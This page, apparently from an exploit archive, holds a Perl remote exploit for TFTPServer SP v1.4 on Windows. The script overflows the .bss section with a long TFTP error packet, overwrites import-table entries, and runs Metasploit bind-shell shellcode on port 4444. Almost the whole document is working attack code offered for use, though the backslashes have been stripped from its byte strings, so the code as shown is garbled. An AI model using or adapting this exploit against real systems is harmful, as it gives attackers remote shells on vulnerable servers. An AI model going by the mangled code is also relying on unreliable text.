TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit
# Published : 2008-05-08
# Author : tixxDZ
# Previous Title : MS Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC
# Next Title : HLDS WebMod 0.48 Multiple Remote Vulnerabilties
#!/usr/bin/perl

#	TFTPServer SP v1.4 for Windows remote .bss overflow exploit
#	The Service or the RunStandAlone version.
#	URL: http://sourceforge.net/projects/tftp-server/
#
#	Author:		tix or tixxDZ	<tixxdz@gmail.com>
#	Date:		07/05/2008
#
#	Tested on Windows XP SP2 French not patched
#
#	TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
#	Other versions may also be vulnerable.
#
#	TFTPServer respect the RFC 1350 for Error packets, lot of other
#		TFTP Servers don't respect it.
#	TFTP Error Packet: "x00x05" . ErrorMsg . "x00"
#
#	BUFFER is at 0041B3AB in the .bss section.
#	This exploit will overwrite all the .bss section and some portion of the .idata section
#	to patch functions addresses in the IAT.
#	
#	For the TFTPServer Service we will patch the time() function
#	For the TFTPServer StandAlone program we will patch the printf() function
#
#	BUFFER = NOPS + SHELLCODE + RET
#	we will put and execute our shellcode in the .idata section, .idata => RWE.

use strict;
use IO::Socket::INET;

my $target = shift ||
	die "Usage: $0 <target> <type>n <type> : type of the programn".
	"t<s> for a TFTP servicent<p> for a TFTP simple programn";

my $type = defined $ARGV[0] ? shift : 's';

my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
"x3dx71x41xbfx75x04x66x32xfcx2fx84xd4x15x24" .
"x0axfdx92xb5x48x76x4bx19xe3x73x0cx77x4fx0d" .
"x4ax43x4ex7cx75x1dx7dx28xd6x96x79x14x91x7b" .
"x1cxb2x72x34xa9x9fxb1x73x49x70x25x98x7fx13" .
"xf5x88xe1x3fx74x2cxbax7ex20xc1xd1xe2x12xe0" .
"x11xd6x6bxd0xe3x40xbfx9fx4ax2fxb9xa8x3dxd2" .
"xebx0cx7ax2bxf9x4bx49x71x05x76x37xb4xb3x86" .
"xd5x41x97x66xbax91x46xb5x47x48x9bx35xa9x43" .
"x4fxbexb7x93xfcx2cx25x90x3cx99x92x77x02xfd" .
"xb8x42x98x15x14xb6x3fxd4x27xf8x2dxf5x24x1c" .
"x67xbbx1dx4exb0xb2x0dxb1x34x04x96xbbxa0x0c" .
"xb8xdexebx0cx5ex56x31x1exadx01xc3x85xc0x75" .
"xf7xc3xfcxe8xeexffxffxffx5cx66x53x93x74x8e" .
"x5cxd3x7bx11x28x40xa7xf6xa5xdcx9bx7dxc5xdb" .
"x9bx80xd9x6fx14x9bxaex2fx8ax9ax5bx86x41xa8" .
"x10x18xbbxe0xe6x82xefx87x27xc0xe8x46x6dx24" .
"xf7x8ax99xc3xccx5ex7ax04x47xbax09x0bx83x45" .
"xe5xd2x40x49xb2x91x09x4ex45x4dxb6x42xcex18" .
"xd4xbexccx7bxe7x8ex37x1fx6cxb3xf7x6bx32x38" .
"x73x1bxaexedx08x9cxc6xb3x66x93x98x45x9bxfb" .
"xdbx8cx05xafx45x59xf9x7dxe1xeex8exb3xaex44" .
"x8ex64x38xaex9dx79x83x60xa1x54xacx09xb8x3f" .
"xd3xe7x4bxc2x86x9dx49x3dxf8x0ax97xc8x0dx67" .
"x70x34x3bx2bx2cx99x90x9fx91x4ex55x73xe9xa1" .
"x3fx1bx04x1exd9x88xafx7fxb0x47x14x65xcax50" .
"x03x65xfcx35xbcxc8x55x35x6cx82xf1x64xa3xba" .
"xaex89x6ax6fx05x89x43xf8x40x3cxe2xb0xddx40" .
"x3cx12xb5xeax94x6cxe5x80x7fx74x7cx61x06x2d" .
"x81xbbxacx2exadx22x25xb5x2bxc3xdax58x3axf6" .
"x77xf3x65xd0x4bx7ax72x48x10xf4x9exbcx58xf5" .
"xf4x41x1axd7xf6xfcxb7xb4x8bx7bxf0x11x38xd0" .
"x68x14xc0x94x7fx27x49x9fx80x01xeax48x2dxff" .
"x5dx26xbbxfex0cx99x6ex50x51xc9xf9xffx74xef" .
"x37xacx79x26xadxacx7axf0xcdx83x0fxa8xcdxa7" .
"xcbx33xd1x7ex81x44xfdx17xd5x31xfaxb8x46xb9" .
"xd5xb8xb8x45xdax46x38x46xdax46";

my ($RET,$buffer) = "x01x01x42x00"; # in the .idata section

if ($type =~ /p/i) {
	#	"x00x05" + 20411 bytes needed to patch the printf() function at 00420360
	#	---------------------------------------------------------------------------
	#	0040EB50  -FF25 60034200    JMP DWORD PTR DS:[<&msvcrt.printf>]
	#	---------------------------------------------------------------------------
	
	print STDOUT "Exploiting TFTPServer RunStandAlone programn";
	
	$buffer = "x90" x 19907 . $shellcode . $RET;
}
else {
	#	"x00x05" + 20459 bytes needed to patch the time() function at 00420390
	#	------------------------------------------------------------------------
	#	0040EB60  -FF25 90034200    JMP DWORD PTR DS:[<&msvcrt.time>]
	#	------------------------------------------------------------------------
	
	print STDOUT "Exploiting TFTPServer Service programn";

	$buffer = "x90" x 19955 . $shellcode . $RET;
}

my $sock = IO::Socket::INET->new(	PeerAddr  => $target,
					PeerPort  =>  69,
					Proto     => 'udp')
	or die "error: $!n";

$sock->send("x00x05" . $buffer, 0);
	
print STDOUT "done.n";
exit 0;

# www.Syue.com [2008-05-08]